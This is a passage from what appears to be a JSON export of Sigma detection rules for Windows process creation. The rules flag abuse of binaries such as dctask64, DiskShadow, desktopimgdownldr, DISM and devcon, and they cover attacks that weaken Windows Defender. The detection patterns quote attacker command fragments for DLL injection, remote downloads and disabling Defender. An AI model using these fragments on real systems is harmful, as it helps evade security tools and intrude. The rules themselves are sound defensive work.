https://gitforwindows.org/latest-tag.txt\n        ParentImage: 'C:\\Program Files\\Git\\usr\\bin\\sh.exe'\n        Image: 'C:\\Program Files\\Git\\mingw64\\bin\\curl.exe'\n        CommandLine|contains|all:\n            - '--silent --show-error --output '\n            - 'gfw-httpget-'\n            - 'AppData'\n    condition: selection_curl and 1 of selection_susp_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_susp_download/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Curl Download File\n      technique: T1105\n      atomic_guid: 2b080b99-0deb-4d51-af0f-833d37c4ca6a\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_customshellhost_susp_exec.yml",
    "content": "title: Suspicious CustomShellHost Execution\nid: 84b14121-9d14-416e-800b-f3b829c5a14d\nstatus: test\ndescription: |\n    Detects the execution of CustomShellHost.exe where the child isn't located in 'C:\\Windows\\explorer.exe'. CustomShellHost is a known LOLBin that can be abused by attackers for defense evasion techniques.\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/pull/180\n    - https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-19\nmodified: 2025-10-29\ntags:\n    - attack.defense-evasion\n    - attack.t1216\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\CustomShellHost.exe'\n    filter_main_explorer:\n        Image: 'C:\\Windows\\explorer.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - False positives are unlikely, investigate matches carefully.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dctask64_arbitrary_command_and_dll_execution.yml",
    "content": "title: ManageEngine Endpoint Central Dctask64.EXE Potential Abuse\nid: 6345b048-8441-43a7-9bed-541133633d7a\nstatus: test\ndescription: |\n    Detects the execution of \"dctask64.exe\", a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central.\n    This binary can be abused for DLL injection, arbitrary command and process execution.\nreferences:\n    - https://twitter.com/gN3mes1s/status/1222088214581825540\n    - https://twitter.com/gN3mes1s/status/1222095963789111296\n    - https://twitter.com/gN3mes1s/status/1222095371175911424\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-01-28\nmodified: 2025-01-22\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\dctask64.exe'\n        - Hashes|contains:\n              - 'IMPHASH=6834B1B94E49701D77CCB3C0895E1AFD'\n              - 'IMPHASH=1BB6F93B129F398C7C4A76BB97450BBA'\n              - 'IMPHASH=FAA2AC19875FADE461C8D89DCF2710A3'\n              - 'IMPHASH=F1039CED4B91572AB7847D26032E6BBF'\n    selection_cli:\n        CommandLine|contains:\n            - ' executecmd64 '\n            - ' invokeexe '\n            - ' injectDll '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_defaultpack_uncommon_child_process.yml",
    "content": "title: Uncommon Child Process Of Defaultpack.EXE\nid: b2309017-4235-44fe-b5af-b15363011957\nstatus: test\ndescription: Detects uncommon child processes of \"DefaultPack.EXE\" binary as a proxy to launch other programs\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/\n    - https://www.echotrail.io/insights/search/defaultpack.exe\nauthor: frack113\ndate: 2022-12-31\nmodified: 2024-04-22\ntags:\n    - attack.t1218\n    - attack.defense-evasion\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\DefaultPack.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_defender_default_action_modified.yml",
    "content": "title: PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction'\nid: 1e8a9b4d-3c2a-4f9b-8d1e-7c6a5b4f3d2e\nrelated:\n    - id: 5a9e1b2c-8f7d-4a1e-9b3c-0f6d7e5a4b1f\n      type: similar\nstatus: experimental\ndescription: |\n    Detects the use of PowerShell to execute the 'Set-MpPreference' cmdlet to configure Windows Defender's threat severity default action to 'Allow' (value '6') or 'NoAction' (value '9').\n    This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level.\n    An attacker might use this technique via the command line to bypass defenses before executing payloads.\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference\n    - https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-threatseveritydefaultaction\n    - https://research.splunk.com/endpoint/7215831c-8252-4ae3-8d43-db588e82f952\n    - https://gist.github.com/Dump-GUY/8daef859f382b895ac6fd0cf094555d2\n    - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\nauthor: 'Matt Anderson (Huntress)'\ndate: 2025-07-11\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cmdlet:\n        CommandLine|contains: 'Set-MpPreference'\n    selection_action:\n        CommandLine|contains:\n            - '-LowThreatDefaultAction'\n            - '-ModerateThreatDefaultAction'\n            - '-HighThreatDefaultAction'\n            - '-SevereThreatDefaultAction'\n            - '-ltdefac '\n            - '-mtdefac '\n            - '-htdefac '\n            - '-stdefac '\n    selection_value:\n        CommandLine|contains:\n            - 'Allow'\n            - '6'\n            - 'NoAction'\n            - '9'\n    condition: all of selection_*\nfalsepositives:\n    - Highly unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_defender_remove_context_menu.yml",
    "content": "title: Windows Defender Context Menu Removed\nid: b9e8c7d6-a5f4-4e3d-8b1a-9f0c8d7e6a5b\nrelated:\n    - id: 72a0369a-2576-4aaf-bfc9-6bb24a574ac6\n      type: similar\nstatus: experimental\ndescription: |\n    Detects the use of reg.exe or PowerShell to delete the Windows Defender context menu handler registry keys.\n    This action removes the \"Scan with Microsoft Defender\" option from the right-click menu for files, directories, and drives.\n    Attackers may use this technique to hinder manual, on-demand scans and reduce the visibility of the security product.\nreferences:\n    - https://research.splunk.com/endpoint/395ed5fe-ad13-4366-9405-a228427bdd91/\n    - https://winaero.com/how-to-delete-scan-with-windows-defender-from-context-menu-in-windows-10/\n    - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\n    - https://blog.malwarebytes.com/malwarebytes-news/2021/02/lazyscripter-from-empire-to-double-rat/\nauthor: 'Matt Anderson (Huntress)'\ndate: 2025-07-09\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell_ise.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\reg.exe'\n        - OriginalFileName:\n              - 'powershell_ise.EXE'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n              - 'reg.exe'\n    selection_action:\n        CommandLine|contains:\n            - 'del'\n            - 'Remove-Item'\n            - 'ri '\n    selection_reg_path:\n        CommandLine|contains: '\\shellex\\ContextMenuHandlers\\EPP'\n    condition: all of selection_*\nfalsepositives:\n    - May be part of a system customization or \"debloating\" script, but this is highly unusual in a managed corporate environment.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_desktopimgdownldr_remote_file_download.yml",
    "content": "title: Remote File Download Via Desktopimgdownldr Utility\nid: 214641c2-c579-4ecb-8427-0cf19df6842e\nstatus: test\ndescription: Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.\nreferences:\n    - https://www.elastic.co/guide/en/security/current/remote-file-download-via-desktopimgdownldr-utility.html\nauthor: Tim Rauch, Elastic (idea)\ndate: 2022-09-27\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\desktopimgdownldr.exe'\n        ParentImage|endswith: '\\desktopimgdownldr.exe'\n        CommandLine|contains: '/lockscreenurl:http'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml",
    "content": "title: Suspicious Desktopimgdownldr Command\nid: bb58aa4a-b80b-415a-a2c0-2f65a4c81009\nstatus: test\ndescription: Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet\nreferences:\n    - https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/\n    - https://twitter.com/SBousseaden/status/1278977301745741825\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-07-03\nmodified: 2021-11-27\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|contains: ' /lockscreenurl:'\n    selection1_filter:\n        CommandLine|contains:\n            - '.jpg'\n            - '.jpeg'\n            - '.png'\n    selection_reg:\n        CommandLine|contains|all:\n            - 'reg delete'\n            - '\\PersonalizationCSP'\n    condition: ( selection1 and not selection1_filter ) or selection_reg\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_devcon_disable_vmci_driver.yml",
    "content": "title: Devcon Execution Disabling VMware VMCI Device\nid: 85f520e7-6f5e-43ca-874c-222e5bf9c0de\nstatus: experimental\ndescription: |\n    Detects execution of devcon.exe with commands that disable the VMware Virtual Machine Communication Interface (VMCI) device.\n    This can be legitimate during VMware Tools troubleshooting or driver conflicts, but may also indicate malware attempting to hijack communication with the hardware via the VMCI device.\n    This has been used to facilitate VMware ESXi vulnerability exploits to escape VMs and execute code on the ESXi host.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/devcon\n    - https://communities.vmware.com/t5/VMware-Workstation-Pro/VMCI-driver-issues/td-p/2866060\n    - https://github.com/search?q=devcon+disable+VMWVMCIHOSTDEV\n    - https://huntress.com/blog/esxi-vm-escape-exploit\nauthor: Matt Anderson, Dray Agha, Anna Pham (Huntress)\ndate: 2026-01-02\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\devcon.exe'\n        - OriginalFileName: 'DevCon.exe'\n    selection_action:\n        CommandLine|contains: ' disable '\n    selection_vmci_pci:\n        CommandLine|contains:\n            - '15AD&DEV_0740' # VMware VMCI PCI device (Vendor 0x15AD = VMware, Device 0x0740 = VMCI)\n            - 'VMWVMCIHOSTDEV' # VMware VMCI root host device driver name\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate VMware administration, Tools installation/uninstallation, or troubleshooting driver conflicts.\n    - Automated scripts in virtualized environments for device cleanup.\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_devcon_disable_vmci_driver/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_device_credential_deployment.yml",
    "content": "title: DeviceCredentialDeployment Execution\nid: b8b1b304-a60f-4999-9a6e-c547bde03ffd\nstatus: test\ndescription: |\n    Detects the execution of DeviceCredentialDeployment to hide a process from view.\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/pull/147\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-19\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\DeviceCredentialDeployment.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml",
    "content": "title: Potential DLL Sideloading Via DeviceEnroller.EXE\nid: e173ad47-4388-4012-ae62-bd13f71c18a8\nrelated:\n    - id: ee4c5d06-3abc-48cc-8885-77f1c20f4451\n      type: similar\nstatus: test\ndescription: |\n    Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named \"ShellChromeAPI.dll\".\n    Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\nreferences:\n    - https://mobile.twitter.com/0gtweet/status/1564131230941122561\n    - https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html\nauthor: '@gott_cyber'\ndate: 2022-08-29\nmodified: 2023-02-04\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\deviceenroller.exe'\n        - OriginalFileName: 'deviceenroller.exe'\n    selection_cli:\n        CommandLine|contains: '/PhoneDeepLink'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_devinit_lolbin_usage.yml",
    "content": "title: Arbitrary MSI Download Via Devinit.EXE\nid: 90d50722-0483-4065-8e35-57efaadd354d\nstatus: test\ndescription: Detects a certain command line flag combination used by \"devinit.exe\", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system\nreferences:\n    - https://twitter.com/mrd0x/status/1460815932402679809\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-11\nmodified: 2023-04-06\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - ' -t msi-install '\n            - ' -i http'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dfsvc_suspicious_child_processes.yml",
    "content": "title: Potentially Suspicious Child Process Of ClickOnce Application\nid: 67bc0e75-c0a9-4cfc-8754-84a505b63c04\nstatus: test\ndescription: Detects potentially suspicious child processes of a ClickOnce deployment application\nreferences:\n    - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-12\ntags:\n    - attack.execution\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|contains: '\\AppData\\Local\\Apps\\2.0\\'\n        Image|endswith:\n            # Add more suspicious processes\n            - '\\calc.exe'\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\explorer.exe'\n            - '\\mshta.exe'\n            - '\\net.exe'\n            - '\\net1.exe'\n            - '\\nltest.exe'\n            - '\\notepad.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\reg.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\schtasks.exe'\n            - '\\werfault.exe'\n            - '\\wscript.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dirlister_execution.yml",
    "content": "title: DirLister Execution\nid: b4dc61f5-6cce-468e-a608-b48b469feaa2\nstatus: test\ndescription: Detect the usage of \"DirLister.exe\" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1083/T1083.md\n    - https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/\nauthor: frack113\ndate: 2022-08-20\nmodified: 2023-02-04\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - OriginalFileName: 'DirLister.exe'\n        - Image|endswith: '\\DirLister.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use by users\nlevel: low\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_dirlister_execution/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Launch DirLister Executable\n      technique: T1083\n      atomic_guid: c5bec457-43c9-4a18-9a24-fe151d8971b7\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_discovery_via_reg_queries.yml",
    "content": "title: System Information Discovery via Registry Queries\nid: 0022869c-49f7-4ff2-ba03-85ac42ddac58\nstatus: experimental\ndescription: Detects attempts to query system information directly from the Windows Registry.\nreferences:\n    - https://cert.gov.ua/article/6277849\n    - https://github.com/redcanaryco/atomic-red-team/blob/75fa21076dcefa348a7521403cdd6bfc4e88623c/atomics/T1082/T1082.md\n    - https://github.com/redcanaryco/atomic-red-team/blob/75fa21076dcefa348a7521403cdd6bfc4e88623c/atomics/T1124/T1124.md\nauthor: lazarg\ndate: 2025-06-12\nmodified: 2025-10-25\ntags:\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cmd_reg:\n        Image|endswith: '\\reg.exe'\n        CommandLine|contains: 'query'\n        CommandLine|contains|windash: '-v'\n    selection_cmd_powershell:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains:\n            - 'Get-ItemPropertyValue'\n            - 'gpv'\n    selection_keys:\n        CommandLine|contains:\n            - '\\SOFTWARE\\Microsoft\\Windows Defender' # Details about defender state\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' # Provides details about the OS\n            - '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall' # Lists installed programs\n            - '\\SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation' # Contains time zone details\n            - '\\SYSTEM\\CurrentControlSet\\Services' # Details about existing services\n    condition: 1 of selection_cmd_* and selection_keys\nfalsepositives:\n    - Unlikely\nlevel: low\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_discovery_via_reg_queries/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: System Information Discovery\n      technique: T1010\n      atomic_guid: 66703791-c902-4560-8770-42b8a91f7667\n    - type: atomic-red-team\n      name: Discover OS Product Name via Registry\n      technique: T1082\n      atomic_guid: be3b5fe3-a575-4fb8-83f6-ad4a68dd5ce7\n    - type: atomic-red-team\n      name: Discover OS Build Number via Registry\n      technique: T1082\n      atomic_guid: acfcd709-0013-4f1e-b9ee-bc1e7bafaaec\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_diskshadow_child_process_susp.yml",
    "content": "title: Potentially Suspicious Child Process Of DiskShadow.EXE\nid: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8\nrelated:\n    - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 # Diskshadow Script Mode - Execution From Potential Suspicious Location\n      type: similar\n    - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f # Diskshadow Script Mode - Uncommon Script Extension Execution\n      type: similar\n    - id: 56b1dde8-b274-435f-a73a-fb75eb81262a # Diskshadow Child Process Spawned\n      type: similar\n    - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 # Diskshadow Script Mode Execution\n      type: similar\nstatus: test\ndescription: Detects potentially suspicious child processes of \"Diskshadow.exe\". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.\nreferences:\n    - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/\n    - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration\n    - https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow\n    - https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf\n    - https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware\n    - https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-15\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\diskshadow.exe'\n        Image|endswith:\n            # Note: add or remove additional binaries according to your org needs\n            - '\\certutil.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\wscript.exe'\n    condition: selection\nfalsepositives:\n    - False postitve can occur in cases where admin scripts levreage the \"exec\" flag to execute applications\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml",
    "content": "title: Diskshadow Script Mode - Uncommon Script Extension Execution\nid: 1dde5376-a648-492e-9e54-4241dd9b0c7f\nrelated:\n    - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 # Diskshadow Script Mode - Execution From Potential Suspicious Location\n      type: similar\n    - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 # Potentially Suspicious Child Process Of DiskShadow.EXE\n      type: similar\n    - id: 56b1dde8-b274-435f-a73a-fb75eb81262a # Diskshadow Child Process Spawned\n      type: similar\n    - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 # Diskshadow Script Mode Execution\n      type: similar\nstatus: test\ndescription: |\n    Detects execution of \"Diskshadow.exe\" in script mode to execute an script with a potentially uncommon extension.\n    Initial baselining of the allowed extension list is required.\nreferences:\n    - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/\n    - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration\n    - https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow\n    - https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf\n    - https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware\n    - https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-15\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'diskshadow.exe'\n        - Image|endswith: '\\diskshadow.exe'\n    selection_flag:\n        CommandLine|contains|windash: '-s '\n    filter_main_ext:\n        # Note: can be changed to an \"endswith\" to avoid rare FPs. But you need to account for quoted paths\n        # Note: Using the \".txt\" is based on the MS documentation example. Best add the extension you use internally before using this rule\n        CommandLine|contains: '.txt'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - False postitve might occur with legitimate or uncommon extensions used internally. Initial baseline is required.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml",
    "content": "title: Diskshadow Script Mode - Execution From Potential Suspicious Location\nid: fa1a7e52-3d02-435b-81b8-00da14dd66c1\nrelated:\n    - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f # Diskshadow Script Mode - Uncommon Script Extension Execution\n      type: similar\n    - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 # Potentially Suspicious Child Process Of DiskShadow.EXE\n      type: similar\n    - id: 56b1dde8-b274-435f-a73a-fb75eb81262a # Diskshadow Child Process Spawned\n      type: similar\n    - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 # Diskshadow Script Mode Execution\n      type: similar\nstatus: test\ndescription: Detects execution of \"Diskshadow.exe\" in script mode using the \"/s\" flag where the script is located in a potentially suspicious location.\nreferences:\n    - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/\n    - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration\n    - https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow\n    - https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf\n    - https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware\n    - https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-15\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'diskshadow.exe'\n        - Image|endswith: '\\diskshadow.exe'\n    selection_cli:\n        CommandLine|contains|windash: '-s '\n    selection_paths:\n        CommandLine|contains:\n            # Note: Add additional susp paths based on your org needs\n            - ':\\Temp\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\'\n            - '\\AppData\\Roaming\\'\n            - '\\ProgramData\\'\n            - '\\Users\\Public\\'\n    condition: all of selection_*\nfalsepositives:\n    - False positives may occur if you execute the script from one of the paths mentioned in the rule. Apply additional filters that fits your org needs.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dism_enable_powershell_web_access_feature.yml",
    "content": "title: PowerShell Web Access Feature Enabled Via DISM\nid: 7e8f2d3b-9c1a-4f67-b9e8-8d9006e0e51f\nstatus: test\ndescription: Detects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse\nreferences:\n    - https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a\n    - https://gist.github.com/MHaggis/7e67b659af9148fa593cf2402edebb41\nauthor: Michael Haag\ndate: 2024-09-03\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\dism.exe'\n        - OriginalFileName: 'DISM.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'WindowsPowerShellWebAccess'\n            - '/online'\n            - '/enable-feature'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate PowerShell Web Access installations by administrators\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dism_remove.yml",
    "content": "title: Dism Remove Online Package\nid: 43e32da2-fdd0-4156-90de-50dfd62636f9\nstatus: test\ndescription: Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism\n    - https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html\nauthor: frack113\ndate: 2022-01-16\nmodified: 2022-08-26\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_dismhost:\n        Image|endswith: '\\DismHost.exe'\n        ParentCommandLine|contains|all:\n            - '/Online'\n            - '/Disable-Feature'\n            # - '/FeatureName:'\n            # - '/Remove'\n            # /NoRestart\n            # /quiet\n    selection_dism:\n        Image|endswith: '\\Dism.exe'\n        CommandLine|contains|all:\n            - '/Online'\n            - '/Disable-Feature'\n            # - '/FeatureName:'\n            # - '/Remove'\n            # /NoRestart\n            # /quiet\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate script\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_dism_remove/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Disable Windows Defender with DISM\n      technique: T1562.001\n      atomic_guid: 871438ac-7d6e-432a-b27d-3e7db69faf58\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml",
    "content": "title: DLL Sideloading by VMware Xfer Utility\nid: ebea773c-a8f1-42ad-a856-00cb221966e8\nstatus: test\ndescription: Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL\nreferences:\n    - https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-02\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '\\VMwareXferlogs.exe'\n    filter: # VMware might be installed in another path so update the rule accordingly\n        Image|startswith: 'C:\\Program Files\\VMware\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dllhost_no_cli_execution.yml",
